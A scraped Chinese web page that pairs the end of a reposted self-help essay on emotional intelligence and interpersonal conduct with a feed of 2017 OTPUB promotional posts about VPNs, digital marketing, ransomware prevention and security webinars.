阿里高管彭蕾曾说过:不管别人怎么赞扬你也好,或者羞辱你也好,你内心知道你自己是谁,自己内心是很定的,无论是捧你还是打你,外界的状况都不会伤害到你,这才是真正皮实的状态。对于创业者或者我们组建团队的时候,这个能力蛮重要的。
 


2、远离垃圾人


生活中,我们难免会遇到各种“垃圾人”。他们到处跑来跑去,身上充满了负面垃圾:充满了沮丧、愤怒、忌妒、算计、仇恨,充满了傲慢与偏见、贪心不满足、抱怨、比较,充满了见不得人好、愚昧、无知、烦恼、报复、和充满了失望。随着心中的垃圾堆积又堆积,他们终需找个地方倾倒;有时候,我们刚好碰上了,垃圾就往我们身上丢。 所以,无须介意。只要微笑、挥挥手、远离他们,然后继续走我们自己的路就行。绝对不让垃圾人接管自己生活当中的任何一天。人生短暂,绝对不要浪费心思和精力在这些事上。

千万不能和垃圾人吵起来,甚至大打出手,最后受苦的还是自己,不值得。一物降一物,垃圾人肯定会遇到更狠的人对付他,但与我们无关。有一句话说得好:人给狗让路,不丢人。
 


3、与人为善,与人遇到矛盾,友好的建设性的解决问题


远离垃圾人的同时,也要防止自己成为别人眼中的垃圾人。所以,一定要做到与人为善,尊重对方,客气友好。与人遇到矛盾和问题,一定不要动不动就口出恶言,要友好的建设性的解决问题,起码也得先礼后兵,因为很多后果严重的事件都始于一两句恶语激怒了彼此。千万不要一开始就把问题发展到不可收拾的地步。 

关于互相尊重:“尊重上级是天职;尊重下属是美德;尊重同事是本份;尊重客户是常识;而尊重所有人则是教养。”我们每一个人都要做到这一点,因为尊重他人是良好沟通的基础,而且尊重他人就是尊重自己。 

关于发脾气:把脾气发出来,那叫本能;把脾气压下去,那叫本事。有时候把脾气发出来,发的不是脾气,发的是代价。
 


4、忍一忍,冲动是魔鬼


忍,不是叫你逆来顺受,而是用更好的办法解决问题,不是动不动就两败俱伤。某人惹你生气了,即使你恨不得马上给他一耳光,也要让子弹飞了一会儿。如果过了一晚上,你还是想给他一耳光,那就再想办法,但往往一个晚上后,你改变了主意。不全是忍了,而是想到了更好的解决办法。

同样,凡是有什么想法,尤其是大事情,千万不要冲动决定。在工作中受到了一点小委屈,也不要立即冲动说不干了(最后你会发现,在哪里工作都会有受气的时候)。

大事急事做决定一定要缓一缓,冲动依然会付出代价。有一句说得很好:大事要细办,小事要认真办,急事要缓办。急事宜缓办,忙则多错。说干就干有的时候是执行力的体现,但有时候是冲动的体现,需要仔细辨别。
 


5、不做愤青


马云曾经说过:10年前我更关心全世界,结果日子过得非常艰难;5年前我很关心中国的命运,我也过得很艰难;3年前开始我只关心公司,我的日子开始好起来。现在我只关心自己,越来越好。所以我说,关心好自己,每个人把自己喜欢的事做好,这个世界会好起来,别像奥巴马一样关心全世界。

社会总会存在各种不公,因此,你不要因为你的愤怒而耽误了你自己的行动。首先从改变自己开始,然后就能改变周围的人,再能改变自己的家乡,然后就能改变整个世界。否则,人微言轻,吃着地沟油的命,操着中南海的心,你说了,你愤怒了,但是都不算。
 


6、养成记日记的习惯


 
写日记有很多好处。可以在日记里反省,总结和规划未来,调整自己的心态。日记是一种很好的自我调节的手段。假如人是一颗飞向目标的火箭,那么日记有点修正你跑偏方向的功能。很多成功人士,都有记录日记的习惯。日记不用天天记,需要反省,总结和规划的时候就可以写一写,写的篇幅可长可短。写完之后,可以定期回看一下曾经写的日记,也是一笔宝贵的经历。因为日记里写的都是自己真实的想法和内心,有的东西可能无法让外人直视,所以请注意做好对日记的保密工作。
 


7、讨论可以,但不与人争论(辩论)


正如上面所说,遇到各种不同观点,可以与人理性讨论,但千万不要做这些无意义的争吵和争论,辩论,更不要想着把自己的观点强加于人,没有意义,对你也没有任何好处,反而浪费了你的大量时间,影响了你的好心情。有一句话说得好,世界上有两件事最难,一是把自己的思想装进别人的脑袋里;二是把别人的钱装进自己的口袋里。 人观点和思想的改变不是靠争论,主要是靠亲身经历,吃过亏上过当了,才会痛彻心扉,更何况有时候我们自己的观点未必就是对的。 随着时间的增长,我们也会不断修正自己的观点和看法。所以,请从现在开始,在与人相处的时候,用友好的态度去探讨问题,拒绝争论或者争吵,谁也别想说服谁,即使说服了谁也是口服心不服,即使心服了也没有任何意义,少说多做多思考,管住自己这张嘴。有一个关于孔子与子贡关于“三季人”的故事,可以很好的说明这个问题:

早晨,子贡在大院门口打扫院子。有人来到,问子贡:“您是孔子吗?” 子贡答道:“有什么事需要向我们老师请教?” “我想请教关于时间的问题?” “这个问题我知道,可以回答你” “那你说说一年有几季?” “四季。”子贡笑答。 “不对,一年只有三季!” “四季!!” “三季!!” “四季!!!”子贡理直气壮。 “三季!!!”来人毫不示弱。然后就争论不止,一直争论到中午也没消停。

孔子听到声音,从院内出来,子贡上前讲明原委,让孔子评定。孔子先是不答,观察一阵后说:“一年的确只有三季。“ 来人听此,大笑而去。

待来人走后,子贡忙问老师:“这与您所教有别啊,且一年的确有四季啊! “这一年到底应是几季?”

孔子答:“四季” ,子贡不解。

孔子继而说道:“这时和刚才不同,方才那人一身绿衣。他分明是田间的蚱蜢。蚱蜢者,春天生,秋天亡,一生只经历过春、夏、秋三季,哪里见过冬天?所以在他的思维里,根本就没有‘冬季’这个概念。你跟这样的人那就是争上三天三夜也不会有结果的。你若不顺着他说,他能这么爽快就走吗?你虽然上了个小当,但却学到了莫大一个乖。” 说完,子贡立刻明白了。
 
五、深度思考的能力
有的人看起来也很勤奋,每天也都勤勤恳恳的工作学习和生活,但始终无法向前获得更大的成功。而有的人,平时也不怎么太努力工作,也不怎么太努力学习,却最后过得很好。你在每天挤公交地铁上班,没准人家已经在旅行的路上,在朋友圈晒世界各地的蓝天白云。这是为什么呢?不是说了越努力越幸运吗?

实际上这里有一个战术上的勤奋和战略上的勤奋(思考)的差别。

每天除了完成日常的工作,生活和学习任务,也需要花一点时间来反省过去,总结经验,不断分析现在的问题,找到答案,纠正,思考规划未来,保持方向的正确。

人生是一场持久战和长跑,随时都有机会弯道超车。试着深度思考,永远不要用战术上的勤奋掩盖战略上的懒惰。否则,你每天的忙碌,也无法忙碌出一个精彩的人生。

人生中有些事情,宜早规划早执行。以北京的房价和限车牌限号就是个非常典型的例子。后办者非常被动。

此外,除了工作之外,应该发展一个第二职业或者兼职,能够通过第二职业获得额外的收入,以应对第一职业的35岁现象。第二职业可以是投资(炒股,买房等,但风险较大需要慎重,但高风险意味着高收入。第一次炒股一定要用小本投入,因为第一次一般都会亏,小本当交学费不心疼),也可以去兼职,也可以写书,去当培训老师或者哪怕是开淘宝,摆地摊。总之,一定要趁年轻,多找事做。
 
六、遏制错误的能力
每个人都会犯错误。但是,我们应该拥有高度的责任来遏制错误的发生,因为错误一旦发生,就意味着会有代价或者损失,有的损失或者代价甚至是巨大而不可挽回的。
 


1、堵住逻辑漏洞


做事情的时候,要符合逻辑和一定的流程,不能有任何疏忽。把该考虑的因素都必须考虑进来,不能相信口头承诺。在处理文字或者签订合同的时候,也要严谨, 不能有漏洞,要善于使用不同的方法(比如提前调查各种背景,提前向自己的亲戚朋友征询意见和建议(个人的认识和经历总有局限性,因此一定要参考大家的意见))发现其中的坑,然后及早提出问题,先小人后君子。否则,问题就会越来越大,错误会越来越严重。
 
 


2、克服粗心,反复检查


有一类错误,是因为粗心大意造成的,这类错误最好克服。方法就是:反复检查。比如你发一条短信,发一封邮件给领导,里面由于粗心可能会出现各种错别字。但是,只要你态度认真,打完字之后,再仔细看过检查一两遍,这种问题就会解决。
 


3、预判并解决存在的问题,防患于未然


有时候,错误是可以预测到的,那么这个时候为了防止错误的发生,请立即采取措施解除错误的隐患。比如你看到电脑旁边有一杯水,你应该会预测到这杯水可能会不小心被碰倒洒到电脑上,造成电脑故障。那么一旦预判到这个错误可能发生之后,立即采取行动,把这杯水喝掉或者移开到安全地方,就可以完全预防可能发生的错误。 

孔子曰”君子不立于危墙之下”,君子要远离危险的地方。这包括两方面:一是防患于未然,预先觉察潜在的危险,并采取防范措施;二是一旦发现自己处于危险境地,要及时离开。
 


4、遵守规则,程序


遵守社会中指定的规则,流程,和程序,可以防止错误的发生。社会中的规则是这个社会平安健康运行的一套科学总结,不可违规,否则会造成严重的错误和不可挽回的损失。比如不要酒后驾车,不要闯红灯,比如乘车前先要进行安检,比如医院的“一人一管一抛弃”,甚至进入野生动物园不要下车,这些都是一些常见的社会规则,流程,不可打破。要有敬畏之心,严格遵守,否则就会出现各种严重的车祸,恐怖袭击,医疗事故,危及生命安全造成严重后果。
 
七、学会拒绝的能力
有的时候,大家由于年轻,缺乏足够的社会经验,对于别人提出的非分要求(比如借钱),碍于情面,不好意思拒绝,硬着头皮答应,结果非常被动,甚至给自己带来严重后果。

这里给大家的一句话就是:别不好意思拒绝别人,反正那些好意思为难你的人都不是什么好人。因此,对于别人提的一些要求,仔细分析是否为过分要求,如果是过分要求,我们应该要敢于拒绝,善于拒绝。
 
转载分享阅读:http://mallocfree.com/basic/c/eq.htm 

【直播预告】Sophos云服务助力快速组网VPN网络

OT学习平台 发表了文章 • 0 个评论 • 581 次浏览 • 2017-09-11 15:56 • 来自相关话题

VPN一般指虚拟专用网络,是一种在公用网络上建立的专用网络,进行加密通讯,在企业网络中有广泛应用。

VPN网关通过对数据包的加密和数据包目标地址的转换实现远程访问。VPN有多种分类方式,主要是按协议进行分类。VPN可通过服务器、硬件、软件等多种方式实现。

随着应用市场的需求,多分支计算机应用已经越来越广泛,但对于多分支点的计算机管理还存在着诸多挑战。

传统分支点管理的痛点

1、网点非常多

2、地域广

3、网点增长快

4、计算机少

5、无法跟上高增长节奏的有限的IT资源

总部IT部门无法有效进行管理

1、无法统一安全策略

2、运维效率低下

3、持续投入的人员成本

分支点的计算机管理通常是总部 IT 的恶梦。然而以上这些恶梦,通过VPN组建即可轻松化解。

如果您的企业设有较多的小微型分支机构,利用Sophos公司独特的VPN设备——RED,快速组建一个免配置、免维护的星型VPN网络。便于您简单经济地实现分支机构与总部的连接,并确保安全的 Internet 访问。

敬请关注,9月14日14:00,“Sophos云服务助力快速组网VPN网络”直播活动,专家与您分享,VPN快速搭建的方法.

直播间地址:“Sophos云服务助力快速组网VPN网络​” 查看全部
VPN一般指虚拟专用网络,是一种在公用网络上建立的专用网络,进行加密通讯,在企业网络中有广泛应用。

VPN网关通过对数据包的加密和数据包目标地址的转换实现远程访问。VPN有多种分类方式,主要是按协议进行分类。VPN可通过服务器、硬件、软件等多种方式实现。

随着应用市场的需求,多分支计算机应用已经越来越广泛,但对于多分支点的计算机管理还存在着诸多挑战。

传统分支点管理的痛点

1、网点非常多

2、地域广

3、网点增长快

4、计算机少

5、无法跟上高增长节奏的有限的IT资源

总部IT部门无法有效进行管理

1、无法统一安全策略

2、运维效率低下

3、持续投入的人员成本

分支点的计算机管理通常是总部 IT 的恶梦。然而以上这些恶梦,通过VPN组建即可轻松化解。

如果您的企业设有较多的小微型分支机构,利用Sophos公司独特的VPN设备——RED,快速组建一个免配置、免维护的星型VPN网络。便于您简单经济地实现分支机构与总部的连接,并确保安全的 Internet 访问。

敬请关注,9月14日14:00,“Sophos云服务助力快速组网VPN网络”直播活动,专家与您分享,VPN快速搭建的方法.

直播间地址:“Sophos云服务助力快速组网VPN网络​”

Convertlab——企业营销的数字化转型

OT学习平台 发表了文章 • 0 个评论 • 540 次浏览 • 2017-08-08 15:15 • 来自相关话题

说到营销科技(MarTech)很多人可能都不太熟悉,但你一定了解,谷歌90%的收入来自广告、北美企业每年营收的12%用于营销和广告。而今年,企业的营销部门在信息技术方面的投入,即将超过传统企业信息化投入的总和,营销科技蕴含着巨大的市场空间。
虽然数字营销在国内尚处早期,以单点解决方案为主,但Convertlab跨过单点解决方案,直接提供平台服务。
Convertlab为企业提供创新的数字营销平台——DM Hub。该平台允许企业的数字营销部门在一个开放集成的平台上发掘、培育和连接客户,大幅提升各项转化率;打通企业的营销触点,对数据采集并处理,针对不同触点提供相应的内容交互能力,允许企业对客户旅程进行个性化设计和自动化执行,通过实时的数据分析形成营销闭环。
Convertlab是一款颠覆传统营销思维和运行模式的产品,是企业开展数字化营销时信息交互的枢纽,这也正是DM Hub的寓意和使命。
DM Hub 它能够将一家企业包括数字广告在内的全渠道数据来源进行梳理整合,对每个数据进行分析,将之进行归类分组,从中挖掘出指向企业不同营销阶段的客户:潜在客户、意愿客户、购买客户、忠诚客户等,并采用智能化、人性化的方式将企业市场部设计的对策营销方案传达给各个目标客户。
想要了解什么是营销科技(MarTech)?数字营销又是如何成为了企业发展的焦点?敬请关注8月10日由OTPUB举办的“企业营销的数字化转型”线上直播活动,与您分享新时代的数字变革之路。
点击预约观看直播:“企业营销的数字化转型” 查看全部
说到营销科技(MarTech)很多人可能都不太熟悉,但你一定了解,谷歌90%的收入来自广告、北美企业每年营收的12%用于营销和广告。而今年,企业的营销部门在信息技术方面的投入,即将超过传统企业信息化投入的总和,营销科技蕴含着巨大的市场空间。
虽然数字营销在国内尚处早期,以单点解决方案为主,但Convertlab跨过单点解决方案,直接提供平台服务。
Convertlab为企业提供创新的数字营销平台——DM Hub。该平台允许企业的数字营销部门在一个开放集成的平台上发掘、培育和连接客户,大幅提升各项转化率;打通企业的营销触点,对数据采集并处理,针对不同触点提供相应的内容交互能力,允许企业对客户旅程进行个性化设计和自动化执行,通过实时的数据分析形成营销闭环。
Convertlab是一款颠覆传统营销思维和运行模式的产品,是企业开展数字化营销时信息交互的枢纽,这也正是DM Hub的寓意和使命。
DM Hub 它能够将一家企业包括数字广告在内的全渠道数据来源进行梳理整合,对每个数据进行分析,将之进行归类分组,从中挖掘出指向企业不同营销阶段的客户:潜在客户、意愿客户、购买客户、忠诚客户等,并采用智能化、人性化的方式将企业市场部设计的对策营销方案传达给各个目标客户。
想要了解什么是营销科技(MarTech)?数字营销又是如何成为了企业发展的焦点?敬请关注8月10日由OTPUB举办的“企业营销的数字化转型”线上直播活动,与您分享新时代的数字变革之路。
点击预约观看直播:“企业营销的数字化转型

​移动互联时代,企业移动安全如何保证

OT学习平台 发表了文章 • 0 个评论 • 519 次浏览 • 2017-07-24 17:29 • 来自相关话题

智能手机等移动设备的普及将人们带入了移动互联网时代,同时,移动设备也越来越多的进入到企业办公之中,移动互联网为我们带来便利的同时也引发了关于移动安全的担忧,现在恶意软件以移动设备为依托,肆意传播,所以,控制恶意软件的传播刻不容缓,企业移动安全的问题不可忽视。
众所周知,Android设备相较于IOS设备的漏洞更多,主要是因为Android是一个开源的系统,每个独立的手机商都可以根据自己的需求对Android进行定制,而且应用的审核标准也比较低,这就成了恶意软件利用的目标;随着技术的发展,恶意软件的制作成本也越来越低,导致移动端的攻击行为逐渐规模化,而其主要载体会转向APP和APP插件。
任何智能手机都可以作为一个记录设备,这些设备上的数据泄露只要是因为其硬件可远程操控,另外,移动设备本身也可以作为发起攻击的媒介;攻击者会利用暗藏的恶意软件窃取个人或企业的敏感数据,它可能像间谍一样获取你的回忆记录、数据信息、甚至局域网或者可发现范围内的蓝牙设备的存储数据等。
企业移动安全应该主动防御
在企业移动化的过程中,应尽力确保移动应用的安全,因为企业移动化的很多功能都是基于移动应用来实现,而现在大多数开发者只注重产品的迭代和技术攻破,在应用安全性方面并没有投入太多的资源,这就造成了很大的安全隐患。
企业提升移动安全需要保持积极的态度,先做好员工安全意识教育,培养员工良好的使用移动设备习惯。
其次,企业在选择移动办公产品时,除了注重产品的品质和服务外,还应该注重产品的安全性。随着技术的发展,产品在技术和功能方面的差异越来越容易被复制和超越,而安全性不但是未雨绸缪的超前意识,更是一种负责任的严谨态度。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约观看直播>>> 查看全部
智能手机等移动设备的普及将人们带入了移动互联网时代,同时,移动设备也越来越多的进入到企业办公之中,移动互联网为我们带来便利的同时也引发了关于移动安全的担忧,现在恶意软件以移动设备为依托,肆意传播,所以,控制恶意软件的传播刻不容缓,企业移动安全的问题不可忽视。
众所周知,Android设备相较于IOS设备的漏洞更多,主要是因为Android是一个开源的系统,每个独立的手机商都可以根据自己的需求对Android进行定制,而且应用的审核标准也比较低,这就成了恶意软件利用的目标;随着技术的发展,恶意软件的制作成本也越来越低,导致移动端的攻击行为逐渐规模化,而其主要载体会转向APP和APP插件。
任何智能手机都可以作为一个记录设备,这些设备上的数据泄露只要是因为其硬件可远程操控,另外,移动设备本身也可以作为发起攻击的媒介;攻击者会利用暗藏的恶意软件窃取个人或企业的敏感数据,它可能像间谍一样获取你的回忆记录、数据信息、甚至局域网或者可发现范围内的蓝牙设备的存储数据等。
企业移动安全应该主动防御
在企业移动化的过程中,应尽力确保移动应用的安全,因为企业移动化的很多功能都是基于移动应用来实现,而现在大多数开发者只注重产品的迭代和技术攻破,在应用安全性方面并没有投入太多的资源,这就造成了很大的安全隐患。
企业提升移动安全需要保持积极的态度,先做好员工安全意识教育,培养员工良好的使用移动设备习惯。
其次,企业在选择移动办公产品时,除了注重产品的品质和服务外,还应该注重产品的安全性。随着技术的发展,产品在技术和功能方面的差异越来越容易被复制和超越,而安全性不但是未雨绸缪的超前意识,更是一种负责任的严谨态度。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约观看直播>>>

如何防范网络病毒的四点建议

OT学习平台 发表了文章 • 0 个评论 • 562 次浏览 • 2017-07-21 17:37 • 来自相关话题

自今年5月爆发wannacry勒索病毒以来,各种蠕虫病毒接踵而至,着实是让世界杀毒市场活了一把,“暗云Ⅲ”,Petya等等,一个比一个厉害,令人防不胜防,即使你染上了病毒也有可能完全不知情。
目前人们并没有养成很好的上网习惯,病毒预防的意识也很差,而且大多数用户更倾向于老旧版本的操作系统,以为旧的系统各方面都更加成熟,用起来也顺手,对于系统升级,维护方面有很强的抵触心理。






这里OTPUB小编就跟大家分享4个平时生活中预防网络病毒的建议。
1、安装杀毒软件,这一点相信大多数的人都做到了这一点;在使用杀毒软件的时候,建议开始病毒库自动更新,保证杀毒软件可以最快的识别网络上的新型病毒,另外,建议每周至少一次对个人电脑进行一些全盘病毒扫描,确保电脑没有隐藏的病毒。
2、使用基于客户端的防火墙或过滤措施,以增强计算机对黑客和恶意代码的攻击 的免疫力。或者在一些安全网站中,可对自己的计算机做病毒扫描,察看它是否存在安全漏洞与病毒。如果你经常在线,这一点很有必要,因为如果你的系统没有加设有效防护,你的个人资料很有可能会被他人窃取。
3、在使用外接设备(例如U盘,光盘,移动硬盘灯)时,先对其进行扫描,以防万一。
4、不安装来历不明的软件,下载软件要到官方指定的站点下载,切不可贪图省事去一些未知网站,以防下载的软件里面包含电脑病毒。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约直播>>>
或扫描下方二维码预约 查看全部

自今年5月爆发wannacry勒索病毒以来,各种蠕虫病毒接踵而至,着实是让世界杀毒市场活了一把,“暗云Ⅲ”,Petya等等,一个比一个厉害,令人防不胜防,即使你染上了病毒也有可能完全不知情。
目前人们并没有养成很好的上网习惯,病毒预防的意识也很差,而且大多数用户更倾向于老旧版本的操作系统,以为旧的系统各方面都更加成熟,用起来也顺手,对于系统升级,维护方面有很强的抵触心理。

勒索病毒.jpg


这里OTPUB小编就跟大家分享4个平时生活中预防网络病毒的建议。
1、安装杀毒软件,这一点相信大多数的人都做到了这一点;在使用杀毒软件的时候,建议开始病毒库自动更新,保证杀毒软件可以最快的识别网络上的新型病毒,另外,建议每周至少一次对个人电脑进行一些全盘病毒扫描,确保电脑没有隐藏的病毒。
2、使用基于客户端的防火墙或过滤措施,以增强计算机对黑客和恶意代码的攻击 的免疫力。或者在一些安全网站中,可对自己的计算机做病毒扫描,察看它是否存在安全漏洞与病毒。如果你经常在线,这一点很有必要,因为如果你的系统没有加设有效防护,你的个人资料很有可能会被他人窃取。
3、在使用外接设备(例如U盘,光盘,移动硬盘灯)时,先对其进行扫描,以防万一。
4、不安装来历不明的软件,下载软件要到官方指定的站点下载,切不可贪图省事去一些未知网站,以防下载的软件里面包含电脑病毒。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约直播>>>
或扫描下方二维码预约

论坛.jpg


​支付宝为什么很少被网络黑客攻击

OT学习平台 发表了文章 • 0 个评论 • 671 次浏览 • 2017-07-20 17:26 • 来自相关话题

现在越来越多的黑客行为都趋向以盈利作为目标,黑客通过攻击企业内部系统或网站来达到其目的,近期最受关注的莫过于5月份Wannacry勒索病毒事件,全球超过100个国家受到病毒的影响。那么,作为中国目前最大的第三方支付平台的支付宝为什么从没有传出过被黑的新闻?

在2008年,支付宝乃至阿里巴巴整个平台的网络进行了大规模的升级维护,不夸张的说,其安全级别甚至可以和五角大楼相比,这并非说黑客无法攻破,而是黑进去以后的数据连锁机制无人可破,支付宝的数据保护有自启动和认为启动两种,触发后的结果就是整个支付宝平台陷入瘫痪,等工程师修复漏洞后重启才可继续使用,而平台内的资金在这期间只是一串数字,在这期间无法转入转出分毫,也就是说,黑了你也取不走。全世界的大型银行的网络终端各有不同,唯独这个闭锁机制大同小异。
近年来,黑客行为变得似乎更加猖獗,每年都会有数起大型企业遭到入侵事件,甚至连世界知名的杀毒软件厂商卡巴斯基都惨遭毒手,正应了那句老话“玩鹰的被鹰啄了眼”;2015年6月,该公司声称探测到一次针对其系统隐蔽性极高的黑客攻击,实施这次攻击的黑客很可能是策划 2011 年 Duqu 木马的幕后黑手。就在2015年,美国还有 CVS 等连锁药店、大型电信运营商 、婚外情交友网站、大型医保企业、美国官方各部门等均被黑。国内企业也不例外甚至更严重,网站被黑的原因很大一部分是属于经济原因,但并非所有攻击都是因为经济缘故。
黑客行为一般分为以下四种:
一、受雇于他人,商业竞争对手恶意竞争,雇佣黑客攻击同行,敲诈勒索,盗取同行银行账户信息以获取既得利益;
二、恶作剧型,这一类的黑客行为大多是新手黑客,为了满足自己的虚荣心,搜索肉鸡,攻击一个网站,挂上网页木马来试验自己的水平。
三、打击报复型,在互联网行业,因相关服务不到位引起的商业纠纷陷入解决的僵局之后就容易出现黑客攻击报复的行为。
四、窃取资料型,主要是针对拥有付费产品信息的网站。
至于说黑客攻击支付宝这种巨头级企业的可能性则微乎其微,举个很简单的例子,盗贼如果想去某个村民家里偷只羊或许很容易,但是即使再多的盗贼也很难攻打下一个城市。因而一般来讲除了受雇于竞争对手的成建制黑客外很少有人敢对巨头企业下手。
在这一波一波勒索病毒爆发的浪潮之中,安全威胁是每个人头顶上挥之不去的阴云。数字时代为人类带来便利的同时,安全是永恒的话题。其实,对勒索软件的防范应该变被动为主动。Splunk 主动追踪安全威胁,显著增强追踪网络攻击者的能力。精彩尽在 7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约直播>>> 查看全部
现在越来越多的黑客行为都趋向以盈利作为目标,黑客通过攻击企业内部系统或网站来达到其目的,近期最受关注的莫过于5月份Wannacry勒索病毒事件,全球超过100个国家受到病毒的影响。那么,作为中国目前最大的第三方支付平台的支付宝为什么从没有传出过被黑的新闻?

在2008年,支付宝乃至阿里巴巴整个平台的网络进行了大规模的升级维护,不夸张的说,其安全级别甚至可以和五角大楼相比,这并非说黑客无法攻破,而是黑进去以后的数据连锁机制无人可破,支付宝的数据保护有自启动和认为启动两种,触发后的结果就是整个支付宝平台陷入瘫痪,等工程师修复漏洞后重启才可继续使用,而平台内的资金在这期间只是一串数字,在这期间无法转入转出分毫,也就是说,黑了你也取不走。全世界的大型银行的网络终端各有不同,唯独这个闭锁机制大同小异。
近年来,黑客行为变得似乎更加猖獗,每年都会有数起大型企业遭到入侵事件,甚至连世界知名的杀毒软件厂商卡巴斯基都惨遭毒手,正应了那句老话“玩鹰的被鹰啄了眼”;2015年6月,该公司声称探测到一次针对其系统隐蔽性极高的黑客攻击,实施这次攻击的黑客很可能是策划 2011 年 Duqu 木马的幕后黑手。就在2015年,美国还有 CVS 等连锁药店、大型电信运营商 、婚外情交友网站、大型医保企业、美国官方各部门等均被黑。国内企业也不例外甚至更严重,网站被黑的原因很大一部分是属于经济原因,但并非所有攻击都是因为经济缘故。
黑客行为一般分为以下四种:
一、受雇于他人,商业竞争对手恶意竞争,雇佣黑客攻击同行,敲诈勒索,盗取同行银行账户信息以获取既得利益;
二、恶作剧型,这一类的黑客行为大多是新手黑客,为了满足自己的虚荣心,搜索肉鸡,攻击一个网站,挂上网页木马来试验自己的水平。
三、打击报复型,在互联网行业,因相关服务不到位引起的商业纠纷陷入解决的僵局之后就容易出现黑客攻击报复的行为。
四、窃取资料型,主要是针对拥有付费产品信息的网站。
至于说黑客攻击支付宝这种巨头级企业的可能性则微乎其微,举个很简单的例子,盗贼如果想去某个村民家里偷只羊或许很容易,但是即使再多的盗贼也很难攻打下一个城市。因而一般来讲除了受雇于竞争对手的成建制黑客外很少有人敢对巨头企业下手。
在这一波一波勒索病毒爆发的浪潮之中,安全威胁是每个人头顶上挥之不去的阴云。数字时代为人类带来便利的同时,安全是永恒的话题。其实,对勒索软件的防范应该变被动为主动。Splunk 主动追踪安全威胁,显著增强追踪网络攻击者的能力。精彩尽在 7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约直播>>>

对付勒索病毒,Check Point有秘密武器

OT学习平台 发表了文章 • 0 个评论 • 684 次浏览 • 2017-07-17 15:57 • 来自相关话题

WannaCry的阴云还未散去,Petya就已经迫不及待的出现在人们视线之中, 6月27日东欧地区又爆发了新一轮的勒索软件(Petya)攻击事件,受灾最严重的当属乌克兰,大量的政府机构,私人企业遭到了勒索病毒的攻击。
Petya不是一个真正意义上的勒索病毒,但是其破坏力比之之前的Wanncry更加可怕,Petya不只是锁定特定文件,而是直接对磁盘的MBR下手,篡改MBR导致整个磁盘无法访问。具体来说就是Petya并不加密MBR用于后续的勒索,而是直接破坏前25个扇区,当硬盘的MBR损坏之后,计算机就无法再检索驱动器上的数据了。
而且Petya传播方式利用“永恒之蓝”和“永恒之岩”两个漏洞,这就导致了它可以通过内网渗透使用系统的WMIC和Sysinternals的PsExec传播,所以即便电脑修复“永恒之蓝”漏洞,只要内网有中毒电脑,仍有被感染的危险。
面对目前安全运维管理中存在的问题, Check Point独立安全产品解决方案将助您一臂之力。
7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您打开安全管理的未来发展趋势。Check Point还将免费提供一次Securiy Check Up。抓紧时间预约活动报名。
 
点击此处预约报名>>> 查看全部
WannaCry的阴云还未散去,Petya就已经迫不及待的出现在人们视线之中, 6月27日东欧地区又爆发了新一轮的勒索软件(Petya)攻击事件,受灾最严重的当属乌克兰,大量的政府机构,私人企业遭到了勒索病毒的攻击。
Petya不是一个真正意义上的勒索病毒,但是其破坏力比之之前的Wanncry更加可怕,Petya不只是锁定特定文件,而是直接对磁盘的MBR下手,篡改MBR导致整个磁盘无法访问。具体来说就是Petya并不加密MBR用于后续的勒索,而是直接破坏前25个扇区,当硬盘的MBR损坏之后,计算机就无法再检索驱动器上的数据了。
而且Petya传播方式利用“永恒之蓝”和“永恒之岩”两个漏洞,这就导致了它可以通过内网渗透使用系统的WMIC和Sysinternals的PsExec传播,所以即便电脑修复“永恒之蓝”漏洞,只要内网有中毒电脑,仍有被感染的危险。
面对目前安全运维管理中存在的问题, Check Point独立安全产品解决方案将助您一臂之力。
7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您打开安全管理的未来发展趋势。Check Point还将免费提供一次Securiy Check Up。抓紧时间预约活动报名。
 
点击此处预约报名>>>

人脸识别引爆智能黑科技

OT学习平台 发表了文章 • 0 个评论 • 544 次浏览 • 2017-06-28 16:12 • 来自相关话题

不得不说,AlphaGo再一次引爆人们对于人工智能的认知。在智能化引领发展的阶段中,人工智能技术正在越来越广泛地应用在移动互联网领域,越来越多的人工智能技术更多地参与到移动互联网发展中来。
说到人工智能,不得不提人脸识别技术,今天小编要跟大家分享的就是这项引爆市场的“黑科技”。
都说这是一个刷脸的时代,是的“刷脸”的时代真的来了。
6月30日14:00“身边的黑科技,人脸识别的场景化应用”直播活动即将在OTpub平台开启,与您见证万能的“刷脸时代”,我们从人工智能平台到人脸识别技术,完整的介绍人脸识别在我们身边的场景化应用。

直播预约地址:http://www.otpub.com/home/live/baoming.html
  查看全部
不得不说,AlphaGo再一次引爆人们对于人工智能的认知。在智能化引领发展的阶段中,人工智能技术正在越来越广泛地应用在移动互联网领域,越来越多的人工智能技术更多地参与到移动互联网发展中来。
说到人工智能,不得不提人脸识别技术,今天小编要跟大家分享的就是这项引爆市场的“黑科技”。
